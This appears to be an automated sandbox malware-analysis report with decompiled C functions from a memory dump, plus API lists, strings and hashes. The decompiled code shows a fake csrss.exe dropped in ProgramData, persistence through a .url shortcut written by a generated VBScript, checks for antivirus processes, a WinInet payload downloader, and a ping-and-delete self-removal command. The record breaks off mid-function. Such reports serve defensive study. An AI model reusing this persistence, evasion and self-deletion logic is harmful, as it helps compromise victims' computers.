                                                                                                                                          0x035d7e53
                                                                                                                                          0x035d7e81
                                                                                                                                          0x035d7e89
                                                                                                                                          0x035d7e92
                                                                                                                                          0x035d7e97
                                                                                                                                          0x035d7e9c
                                                                                                                                          0x035d7ea6
                                                                                                                                          0x035d7e55
                                                                                                                                          0x035d7e55
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7e55
                                                                                                                                          0x035d7e2c
                                                                                                                                          0x035d7e2c
                                                                                                                                          0x035d7e31
                                                                                                                                          0x035d7e66
                                                                                                                                          0x035d7e6b
                                                                                                                                          0x035d7e70
                                                                                                                                          0x035d7e78
                                                                                                                                          0x035d7e7f
                                                                                                                                          0x035d7e33
                                                                                                                                          0x035d7e33
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7e33
                                                                                                                                          0x035d7e31
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7e35
                                                                                                                                          0x035d7e3f
                                                                                                                                          0x035d7e41
                                                                                                                                          0x035d7e44
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7e48
                                                                                                                                          0x035d7e10
                                                                                                                                          0x035d7da6
                                                                                                                                          0x035d7da9
                                                                                                                                          0x035d7db0
                                                                                                                                          0x035d7dc3
                                                                                                                                          0x035d7eaa
                                                                                                                                          0x035d7eb0
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7dc9
                                                                                                                                          0x035d7dc9
                                                                                                                                          0x035d7de1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7de1
                                                                                                                                          0x035d7dc3
                                                                                                                                          0x035d7da4
                                                                                                                                          0x035d7d09
                                                                                                                                          0x035d7d09
                                                                                                                                          0x035d7d14
                                                                                                                                          0x035d7d22
                                                                                                                                          0x035d7d22
                                                                                                                                          0x035d7cda
                                                                                                                                          0x035d7cdb
                                                                                                                                          0x035d7ceb
                                                                                                                                          0x035d7ceb
                                                                                                                                          0x035d7c96
                                                                                                                                          0x035d7c96
                                                                                                                                          0x035d7c96
                                                                                                                                          0x00000000

                                                                                                                                          APIs
                                                                                                                                          • InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 035D7C87
                                                                                                                                          • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035D7CCD
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Internet$CrackOpen
                                                                                                                                          • String ID: <$GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                                                          • API String ID: 1262293563-3953569400
                                                                                                                                          • Opcode ID: c57e2fddc15b5eac46c33750d6c97caab138a03bf5855748f49433301d0f5a53
                                                                                                                                          • Instruction ID: 1a0f500e05378df4dbe09f3368b3d58887da47bee2abe4602e2615ca61715b51
                                                                                                                                          • Opcode Fuzzy Hash: c57e2fddc15b5eac46c33750d6c97caab138a03bf5855748f49433301d0f5a53
                                                                                                                                          • Instruction Fuzzy Hash: B371C371E01219ABDB31EFE8FC45FAEBBB8FF44760F140165F904E62A0E7315A158A90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D65D0, Relevance: 40.5, APIs: 5, Strings: 18, Instructions: 212sleepfileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E035D65D0(void* __eflags) {
				short _v524;
				short _v1044;
				short _v1564;
				char _v2588;
				char _v3612;
				char _v4636;
				void* _t61;
				void* _t69;
				void* _t71;
				void* _t73;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t128;
				void* _t134;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t150;

				E035D1A00( &_v524, "C:\ProgramData\LKBNMTFJgl");
				E035D1970( &_v524, "\\");
				E035D1970( &_v524, "csrss.exe");
				 *((short*)(_t141 + E035D1B40( &_v524) * 2 - 0x210)) = 0;
				E035D1A00( &_v1044, "C:\ProgramData\LKBNMTFJgl");
				E035D1970( &_v1044, L"\\r.vbs");
				_t61 = E035D7FA0(0,  &_v3612,  &E035DAAD0, 7);
				_t143 = _t142 + 0x38;
				if(_t61 != 0) {
					E035D1970( &_v3612, "\\");
					E035D1970( &_v3612, "viTRMUuKeV");
					E035D1970( &_v3612, L".url");
					_t69 = E035D6340( &_v524);
					_t144 = _t143 + 0x1c;
					__eflags = _t69;
					if(_t69 == 0) {
						goto L1;
					} else {
						_t71 = E035D7EF0("a2guard.exe");
						_t145 = _t144 + 4;
						__eflags = _t71;
						if(_t71 != 0) {
							L10:
							_t73 = E035D7ED0( &_v3612);
							_t146 = _t145 + 4;
							__eflags = _t73;
							if(_t73 != 0) {
								goto L13;
							} else {
								E035D1A00( &_v4636, L"[InternetShortcut]\r\nURL=\"file:///");
								E035D1970( &_v4636,  &_v524);
								E035D1970( &_v4636, L".exe\"");
								_t100 = E035D7AF0( &_v3612,  &_v4636);
								_t146 = _t146 + 0x20;
								__eflags = _t100;
								if(_t100 != 0) {
									goto L13;
								} else {
									goto L12;
								}
							}
						} else {
							_t102 = E035D7EF0("a2service.exe");
							_t145 = _t145 + 4;
							__eflags = _t102;
							if(_t102 != 0) {
								goto L10;
							} else {
								_t103 = E035D7EF0("a2start.exe");
								_t145 = _t145 + 4;
								__eflags = _t103;
								if(_t103 != 0) {
									goto L10;
								} else {
									_t105 = E035D7ED0( &_v3612);
									_t146 = _t145 + 4;
									__eflags = _t105;
									if(_t105 != 0) {
										L13:
										E035D6990( &_v3612);
										E035D1A00( &_v1564,  &_v524);
										E035D1970( &_v1564, L".exe");
										DeleteFileW( &_v1564);
										MoveFileW( &_v524,  &_v1564);
										E035D68E0( &_v1564);
										DeleteFileW( &_v524);
										return 1;
									} else {
										E035D1A00( &_v2588, L"Set objFSO=CreateObject(\"Scripting.FileSystemObject\")\r\n");
										E035D1970( &_v2588, L"outFile=\"");
										E035D1970( &_v2588,  &_v3612);
										E035D1970( &_v2588, L"\"\r\n");
										E035D1970( &_v2588, L"Set objFile = objFSO.CreateTextFile(outFile,True)\r\n");
										E035D1970( &_v2588, L"objFile.Write \"[InternetShortcut]\" & vbCrLf & \"URL=\"\"file:///");
										E035D1970( &_v2588,  &_v524);
										E035D1970( &_v2588, L".exe\"\"\"\r\n");
										E035D1970( &_v2588, L"objFile.Close\r\n");
										_t128 = E035D7AF0( &_v1044,  &_v2588);
										_t150 = _t146 + 0x50;
										__eflags = _t128;
										if(__eflags == 0) {
											L12:
											__eflags = 0;
											return 0;
										} else {
											E035D6A40(0, __eflags,  &_v1044);
											Sleep(0xbb8);
											DeleteFileW( &_v1044);
											_t134 = E035D7ED0( &_v3612);
											_t146 = _t150 + 8;
											__eflags = _t134;
											if(_t134 != 0) {
												goto L13;
											} else {
												return _t134;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}


























                                                                                                                                          0x035d65e5
                                                                                                                                          0x035d65f6
                                                                                                                                          0x035d6607
                                                                                                                                          0x035d661f
                                                                                                                                          0x035d662e
                                                                                                                                          0x035d663f
                                                                                                                                          0x035d6652
                                                                                                                                          0x035d6657
                                                                                                                                          0x035d665c
                                                                                                                                          0x035d6670
                                                                                                                                          0x035d6681
                                                                                                                                          0x035d6692
                                                                                                                                          0x035d669e
                                                                                                                                          0x035d66a3
                                                                                                                                          0x035d66a6
                                                                                                                                          0x035d66a8
                                                                                                                                          0x00000000
                                                                                                                                          0x035d66aa
                                                                                                                                          0x035d66b0
                                                                                                                                          0x035d66bb
                                                                                                                                          0x035d66be
                                                                                                                                          0x035d66c0
                                                                                                                                          0x035d6800
                                                                                                                                          0x035d6807
                                                                                                                                          0x035d680c
                                                                                                                                          0x035d680f
                                                                                                                                          0x035d6811
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6813
                                                                                                                                          0x035d681f
                                                                                                                                          0x035d6832
                                                                                                                                          0x035d6843
                                                                                                                                          0x035d6856
                                                                                                                                          0x035d685b
                                                                                                                                          0x035d685e
                                                                                                                                          0x035d6860
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d6860
                                                                                                                                          0x035d66c6
                                                                                                                                          0x035d66cb
                                                                                                                                          0x035d66d0
                                                                                                                                          0x035d66d3
                                                                                                                                          0x035d66d5
                                                                                                                                          0x00000000
                                                                                                                                          0x035d66db
                                                                                                                                          0x035d66e0
                                                                                                                                          0x035d66e5
                                                                                                                                          0x035d66e8
                                                                                                                                          0x035d66ea
                                                                                                                                          0x00000000
                                                                                                                                          0x035d66f0
                                                                                                                                          0x035d66f7
                                                                                                                                          0x035d66fc
                                                                                                                                          0x035d66ff
                                                                                                                                          0x035d6701
                                                                                                                                          0x035d6869
                                                                                                                                          0x035d6870
                                                                                                                                          0x035d6883
                                                                                                                                          0x035d6894
                                                                                                                                          0x035d68a3
                                                                                                                                          0x035d68b3
                                                                                                                                          0x035d68c0
                                                                                                                                          0x035d68cf
                                                                                                                                          0x035d68da
                                                                                                                                          0x035d6707
                                                                                                                                          0x035d6713
                                                                                                                                          0x035d6724
                                                                                                                                          0x035d6737
                                                                                                                                          0x035d6748
                                                                                                                                          0x035d6759
                                                                                                                                          0x035d676a
                                                                                                                                          0x035d677d
                                                                                                                                          0x035d678e
                                                                                                                                          0x035d67a2
                                                                                                                                          0x035d67b5
                                                                                                                                          0x035d67ba
                                                                                                                                          0x035d67bd
                                                                                                                                          0x035d67bf
                                                                                                                                          0x035d6862
                                                                                                                                          0x035d6862
                                                                                                                                          0x035d6868
                                                                                                                                          0x035d67c5
                                                                                                                                          0x035d67cc
                                                                                                                                          0x035d67d9
                                                                                                                                          0x035d67e6
                                                                                                                                          0x035d67ef
                                                                                                                                          0x035d67f4
                                                                                                                                          0x035d67f7
                                                                                                                                          0x035d67f9
                                                                                                                                          0x00000000
                                                                                                                                          0x035d67fb
                                                                                                                                          0x035d67ff
                                                                                                                                          0x035d67ff
                                                                                                                                          0x035d67f9
                                                                                                                                          0x035d67bf
                                                                                                                                          0x035d6701
                                                                                                                                          0x035d66ea
                                                                                                                                          0x035d66d5
                                                                                                                                          0x035d66c0
                                                                                                                                          0x035d665e
                                                                                                                                          0x035d665e
                                                                                                                                          0x035d6663
                                                                                                                                          0x035d6663

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 035D7FA0: LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FAA
                                                                                                                                            • Part of subcall function 035D7FA0: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FBC
                                                                                                                                            • Part of subcall function 035D7FA0: CoTaskMemFree.OLE32(00000000,035DAAE0), ref: 035D7FEF
                                                                                                                                            • Part of subcall function 035D7FA0: FreeLibrary.KERNEL32(00000000,?,?,035D461E,C:\ProgramData\LKBNMTFJgl,035DAAE0,00000023), ref: 035D7FF6
                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 035D67D9
                                                                                                                                          • DeleteFileW.KERNEL32(?), ref: 035D67E6
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FreeLibrary$AddressDeleteFileLoadProcSleepTask
                                                                                                                                          • String ID: "$.exe$.exe"$.exe"""$.url$C:\ProgramData\LKBNMTFJgl$Set objFSO=CreateObject("Scripting.FileSystemObject")$Set objFile = objFSO.CreateTextFile(outFile,True)$[InternetShortcut]URL="file:///$\r.vbs$a2guard.exe$a2service.exe$a2start.exe$csrss.exe$objFile.Close$objFile.Write "[InternetShortcut]" & vbCrLf & "URL=""file:///$outFile="$viTRMUuKeV
                                                                                                                                          • API String ID: 976351581-227138989
                                                                                                                                          • Opcode ID: 71977068a476b7a7a0dd7b371ad08ae325babea5ddb0d86a34f112fc8a015f95
                                                                                                                                          • Instruction ID: 83e78410b41fad1c0fd16bc5c56e09bcb0092878d716f9d3834e280873871ff3
                                                                                                                                          • Opcode Fuzzy Hash: 71977068a476b7a7a0dd7b371ad08ae325babea5ddb0d86a34f112fc8a015f95
                                                                                                                                          • Instruction Fuzzy Hash: C8612CB6D0031D6ADFB0E7E8EC45ECB72BCBF44144F4805E1A51AE6021EA74E795CBA1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D76A0, Relevance: 35.3, APIs: 11, Strings: 9, Instructions: 284fileCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                          			E035D76A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v1116;
				char _v1636;
				short _v4196;
				void* _t53;
				WCHAR* _t54;
				WCHAR* _t56;
				WCHAR* _t58;
				WCHAR* _t59;
				WCHAR* _t60;
				signed int _t62;
				WCHAR* _t66;
				WCHAR* _t81;
				WCHAR* _t82;
				void* _t87;
				void* _t88;
				WCHAR* _t103;
				WCHAR* _t107;
				WCHAR* _t110;
				int _t115;
				signed int _t120;
				WCHAR* _t121;
				WCHAR* _t122;
				void* _t140;
				intOrPtr* _t141;
				WCHAR* _t143;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t155;

				_t130 = __ecx;
				_t148 = _t147 - 0x1060;
				if( *0x37a2e00 >= 0xc350) {
					L39:
					__eflags = 0;
					return 0;
				} else {
					_t157 =  *0x37a1c4c;
					if( *0x37a1c4c == 0) {
						goto L39;
					} else {
						E035D1BB0( &_v92, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x14], xmm0");
						_t53 = E035D7C30(_t130, __edx, _t157, _a4,  &_v8);
						_t135 = _t53;
						_t149 = _t148 + 0x14;
						if(_t53 != 0) {
							_t141 = __imp__GetLongPathNameW;
							_t54 =  *_t141("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x200, _t140);
							__eflags = _t54;
							if(_t54 == 0) {
								L37:
								_push(_v8);
								goto L38;
							} else {
								__eflags = _t54 - 0x200;
								if(_t54 > 0x200) {
									goto L37;
								} else {
									_t56 = E035D1A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", "C:\ProgramData\LKBNMTFJgl");
									_t149 = _t149 + 8;
									__eflags = _t56;
									if(_t56 != 0) {
										L10:
										_t58 = GetTempPathW(0x200,  &_v1116);
										__eflags = _t58;
										if(_t58 == 0) {
											goto L37;
										} else {
											__eflags = _t58 - 0x200;
											if(_t58 > 0x200) {
												goto L37;
											} else {
												_t59 =  &_v1116;
												_t60 =  *_t141(_t59, _t59, 0x200);
												__eflags = _t60;
												if(_t60 == 0) {
													goto L37;
												} else {
													__eflags = _t60 - 0x200;
													if(_t60 > 0x200) {
														goto L37;
													} else {
														_t62 = E035D1B40( &_v1116);
														_t151 = _t149 + 4;
														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
															 *((short*)(_t146 + E035D1B40( &_v1116) * 2 - 0x458)) = 0x5c;
															_t120 = E035D1B40( &_v1116);
															_t151 = _t151 + 8;
															_t130 = 0;
															__eflags = 0;
															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
														}
														E035D1970( &_v1116, "csrss.exe");
														_t152 = _t151 + 8;
														goto L17;
													}
												}
											}
										}
									} else {
										_t121 = E035D1A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", L"ProgramData");
										_t149 = _t149 + 8;
										__eflags = _t121;
										if(_t121 != 0) {
											goto L10;
										} else {
											_t122 = E035D1A30("C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe", 0x37a204c);
											_t149 = _t149 + 8;
											__eflags = _t122;
											if(_t122 != 0) {
												goto L10;
											} else {
												E035D1A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
												E035D1970( &_v1116, "\\");
												E035D1970( &_v1116, "csrss.exe");
												_t152 = _t149 + 0x18;
												E035D6D50();
												L17:
												_t66 = E035D87C0( &_v1116, _v8, _t135);
												_t149 = _t152 + 0xc;
												_push(_v8);
												__eflags = _t66;
												if(_t66 == 0) {
													L38:
													E035D1510();
													 *0x37a2e00 =  &(( *0x37a2e00)[0]);
													__eflags =  *0x37a2e00;
													goto L39;
												} else {
													E035D1510();
													_t143 = E035D15E0(0x24);
													_t153 = _t149 + 8;
													__eflags = _t143;
													if(_t143 != 0) {
														_t81 = E035D8B20( &_v1116, _t143);
														_t155 = _t153 + 8;
														__eflags = _t81;
														if(_t81 != 0) {
															_t143[0x10] = 0;
															_t82 = E035D1740(_t143, _a16);
															_t155 = _t155 + 8;
															_push(_t143);
															__eflags = _t82;
															if(_t82 != 0) {
																goto L21;
															} else {
																E035D1510();
																_t153 = _t155 + 4;
																__eflags =  *0x37a1300;
																if( *0x37a1300 == 0) {
																	L29:
																	__eflags = _a12;
																	if(_a12 != 0) {
																		E035D8730(_a8);
																		_t153 = _t153 + 4;
																	}
																	 *0x37a2118 = 1;
																	_t87 =  *0x37a211c;
																	__eflags = _t87;
																	if(_t87 == 0) {
																		L33:
																		_t88 =  *0x37a2120;
																		__eflags = _t88;
																		if(_t88 != 0) {
																			TerminateThread(_t88, 0);
																		}
																		E035D1A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
																		E035D1970( &_v4196, "C:\Users\hardz\AppData\Local\Temp\P7Oa6i5muL.exe");
																		E035D1970( &_v4196, L"\" & \"");
																		E035D1970( &_v4196,  &_v1116);
																		E035D1970( &_v4196, "\"");
																		_t153 = _t153 + 0x28;
																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
																		__eflags = _t103;
																		if(_t103 != 0) {
																			CloseHandle(_v24.hThread);
																			CloseHandle(_v24);
																			ExitProcess(0);
																		}
																	} else {
																		_t107 = WaitForSingleObject(_t87, 0xea60);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			goto L33;
																		}
																	}
																} else {
																	_t143 = E035D15E0(0x400);
																	_t153 = _t153 + 4;
																	__eflags = _t143;
																	if(_t143 != 0) {
																		_t110 = E035D7FA0(_t130, _t143,  &E035DAAD0, 7);
																		_t155 = _t153 + 0xc;
																		__eflags = _t110;
																		if(_t110 == 0) {
																			goto L20;
																		} else {
																			E035D1970(_t143, "\\");
																			E035D1970(_t143, "viTRMUuKeV");
																			E035D1970(_t143, L".url");
																			_t155 = _t155 + 0x18;
																			E035D6D70();
																			_t115 = DeleteFileW(_t143);
																			_push(_t143);
																			__eflags = _t115;
																			if(_t115 == 0) {
																				goto L21;
																			} else {
																				E035D1510();
																				_t153 = _t155 + 4;
																				goto L29;
																			}
																		}
																	}
																}
															}
														} else {
															L20:
															_push(_t143);
															L21:
															E035D1510();
															_t153 = _t155 + 4;
														}
													}
													DeleteFileW( &_v1116);
													 *0x37a2e00 =  &(( *0x37a2e00)[0]);
													E035D1A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
													E035D1970( &_v1636, "\\");
													E035D1970( &_v1636, "csrss.exe");
													E035D6340( &_v1636);
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						} else {
							 *0x37a2e00 =  &(( *0x37a2e00)[0]);
							return _t53;
						}
					}
				}
			}







































                                                                                                                                          0x035d76a0
                                                                                                                                          0x035d76a8
                                                                                                                                          0x035d76b5
                                                                                                                                          0x035d7a92
                                                                                                                                          0x035d7a92
                                                                                                                                          0x035d7a97
                                                                                                                                          0x035d76bb
                                                                                                                                          0x035d76bb
                                                                                                                                          0x035d76c3
                                                                                                                                          0x00000000
                                                                                                                                          0x035d76c9
                                                                                                                                          0x035d76d2
                                                                                                                                          0x035d76da
                                                                                                                                          0x035d76e1
                                                                                                                                          0x035d76e5
                                                                                                                                          0x035d76ea
                                                                                                                                          0x035d76ec
                                                                                                                                          0x035d76f1
                                                                                                                                          0x035d7700
                                                                                                                                          0x035d7715
                                                                                                                                          0x035d7717
                                                                                                                                          0x035d7719
                                                                                                                                          0x035d7a7e
                                                                                                                                          0x035d7a7e
                                                                                                                                          0x00000000
                                                                                                                                          0x035d771f
                                                                                                                                          0x035d771f
                                                                                                                                          0x035d7724
                                                                                                                                          0x00000000
                                                                                                                                          0x035d772a
                                                                                                                                          0x035d7734
                                                                                                                                          0x035d7739
                                                                                                                                          0x035d773c
                                                                                                                                          0x035d773e
                                                                                                                                          0x035d77ac
                                                                                                                                          0x035d77b8
                                                                                                                                          0x035d77be
                                                                                                                                          0x035d77c0
                                                                                                                                          0x00000000
                                                                                                                                          0x035d77c6
                                                                                                                                          0x035d77c6
                                                                                                                                          0x035d77cb
                                                                                                                                          0x00000000
                                                                                                                                          0x035d77d1
                                                                                                                                          0x035d77d6
                                                                                                                                          0x035d77de
                                                                                                                                          0x035d77e0
                                                                                                                                          0x035d77e2
                                                                                                                                          0x00000000
                                                                                                                                          0x035d77e8
                                                                                                                                          0x035d77e8
                                                                                                                                          0x035d77ed
                                                                                                                                          0x00000000
                                                                                                                                          0x035d77f3
                                                                                                                                          0x035d77fa
                                                                                                                                          0x035d77ff
                                                                                                                                          0x035d7802
                                                                                                                                          0x035d780b
                                                                                                                                          0x035d781e
                                                                                                                                          0x035d782d
                                                                                                                                          0x035d7832
                                                                                                                                          0x035d7835
                                                                                                                                          0x035d7835
                                                                                                                                          0x035d7837
                                                                                                                                          0x035d7837
                                                                                                                                          0x035d784b
                                                                                                                                          0x035d7850
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7850
                                                                                                                                          0x035d77ed
                                                                                                                                          0x035d77e2
                                                                                                                                          0x035d77cb
                                                                                                                                          0x035d7740
                                                                                                                                          0x035d774a
                                                                                                                                          0x035d774f
                                                                                                                                          0x035d7752
                                                                                                                                          0x035d7754
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7756
                                                                                                                                          0x035d7760
                                                                                                                                          0x035d7765
                                                                                                                                          0x035d7768
                                                                                                                                          0x035d776a
                                                                                                                                          0x00000000
                                                                                                                                          0x035d776c
                                                                                                                                          0x035d7778
                                                                                                                                          0x035d7789
                                                                                                                                          0x035d779a
                                                                                                                                          0x035d779f
                                                                                                                                          0x035d77a2
                                                                                                                                          0x035d7853
                                                                                                                                          0x035d785e
                                                                                                                                          0x035d7863
                                                                                                                                          0x035d7866
                                                                                                                                          0x035d7869
                                                                                                                                          0x035d786b
                                                                                                                                          0x035d7a81
                                                                                                                                          0x035d7a81
                                                                                                                                          0x035d7a89
                                                                                                                                          0x035d7a89
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7871
                                                                                                                                          0x035d7871
                                                                                                                                          0x035d7883
                                                                                                                                          0x035d7885
                                                                                                                                          0x035d7888
                                                                                                                                          0x035d788a
                                                                                                                                          0x035d7894
                                                                                                                                          0x035d7899
                                                                                                                                          0x035d789c
                                                                                                                                          0x035d789e
                                                                                                                                          0x035d7906
                                                                                                                                          0x035d790b
                                                                                                                                          0x035d7910
                                                                                                                                          0x035d7913
                                                                                                                                          0x035d7914
                                                                                                                                          0x035d7916
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7918
                                                                                                                                          0x035d7918
                                                                                                                                          0x035d791d
                                                                                                                                          0x035d7920
                                                                                                                                          0x035d7927
                                                                                                                                          0x035d7995
                                                                                                                                          0x035d7995
                                                                                                                                          0x035d7999
                                                                                                                                          0x035d799e
                                                                                                                                          0x035d79a3
                                                                                                                                          0x035d79a3
                                                                                                                                          0x035d79ad
                                                                                                                                          0x035d79af
                                                                                                                                          0x035d79b4
                                                                                                                                          0x035d79b6
                                                                                                                                          0x035d79cc
                                                                                                                                          0x035d79cc
                                                                                                                                          0x035d79d1
                                                                                                                                          0x035d79d3
                                                                                                                                          0x035d79d8
                                                                                                                                          0x035d79d8
                                                                                                                                          0x035d79ea
                                                                                                                                          0x035d79fb
                                                                                                                                          0x035d7a0c
                                                                                                                                          0x035d7a1f
                                                                                                                                          0x035d7a30
                                                                                                                                          0x035d7a35
                                                                                                                                          0x035d7a58
                                                                                                                                          0x035d7a5e
                                                                                                                                          0x035d7a60
                                                                                                                                          0x035d7a6f
                                                                                                                                          0x035d7a74
                                                                                                                                          0x035d7a78
                                                                                                                                          0x035d7a78
                                                                                                                                          0x035d79b8
                                                                                                                                          0x035d79be
                                                                                                                                          0x035d79c4
                                                                                                                                          0x035d79c6
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x035d79c6
                                                                                                                                          0x035d7929
                                                                                                                                          0x035d7933
                                                                                                                                          0x035d7935
                                                                                                                                          0x035d7938
                                                                                                                                          0x035d793a
                                                                                                                                          0x035d7948
                                                                                                                                          0x035d794d
                                                                                                                                          0x035d7950
                                                                                                                                          0x035d7952
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7958
                                                                                                                                          0x035d795e
                                                                                                                                          0x035d7969
                                                                                                                                          0x035d7974
                                                                                                                                          0x035d7979
                                                                                                                                          0x035d797c
                                                                                                                                          0x035d7982
                                                                                                                                          0x035d7984
                                                                                                                                          0x035d7985
                                                                                                                                          0x035d7987
                                                                                                                                          0x00000000
                                                                                                                                          0x035d798d
                                                                                                                                          0x035d798d
                                                                                                                                          0x035d7992
                                                                                                                                          0x00000000
                                                                                                                                          0x035d7992
                                                                                                                                          0x035d7987
                                                                                                                                          0x035d7952
                                                                                                                                          0x035d793a
                                                                                                                                          0x035d7927
                                                                                                                                          0x035d78a0
                                                                                                                                          0x035d78a0
                                                                                                                                          0x035d78a0
                                                                                                                                          0x035d78a1
                                                                                                                                          0x035d78a1
                                                                                                                                          0x035d78a6
                                                                                                                                          0x035d78a6
                                                                                                                                          0x035d789e
                                                                                                                                          0x035d78b0
                                                                                                                                          0x035d78b2
                                                                                                                                          0x035d78c5
                                                                                                                                          0x035d78d6
                                                                                                                                          0x035d78e7
                                                                                                                                          0x035d78f3
                                                                                                                                          0x035d78fb
                                                                                                                                          0x035d7902
                                                                                                                                          0x035d7902
                                                                                                                                          0x035d786b
                                                                                                                                          0x035d776a
                                                                                                                                          0x035d7754
                                                                                                                                          0x035d773e
                                                                                                                                          0x035d7724
                                                                                                                                          0x035d76f3
                                                                                                                                          0x035d76f3
                                                                                                                                          0x035d76fe
                                                                                                                                          0x035d76fe
                                                                                                                                          0x035d76f1
                                                                                                                                          0x035d76c3

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 035D7C30: InternetCrackUrlA.WININET(00000044,00000000,?,?,?,00000000), ref: 035D7C87
                                                                                                                                          • GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe,00000200,?,?,?,?,?,?), ref: 035D7715
                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 035D78B0
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.469184983.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CrackDeleteFileInternetLongNamePath
                                                                                                                                          • String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe$ProgramData$\$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV
                                                                                                                                          • API String ID: 3724707802-1124964399
                                                                                                                                          • Opcode ID: 983be3b85b1fabc21cbb6823b67da54feca60f2db4066acec749086ae1c94f36
                                                                                                                                          • Instruction ID: d6e5c17e04cb4cccbf2060fd0e554890fa25b514ab11cb440591fc3eb0d411fe
                                                                                                                                          • Opcode Fuzzy Hash: 983be3b85b1fabc21cbb6823b67da54feca60f2db4066acec749086ae1c94f36
                                                                                                                                          • Instruction Fuzzy Hash: DB9106B5940B1966EB30FBE8FC05FDE737CBF44241F0800A5E905E6062FB65A794CAA5
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 035D5B80, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 237threadsleepprocessCOMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                          			E035D5B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				char _v112;
				struct _CONTEXT _v828;
				intOrPtr _t62;
				void* _t70;
				void* _t72;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t108;
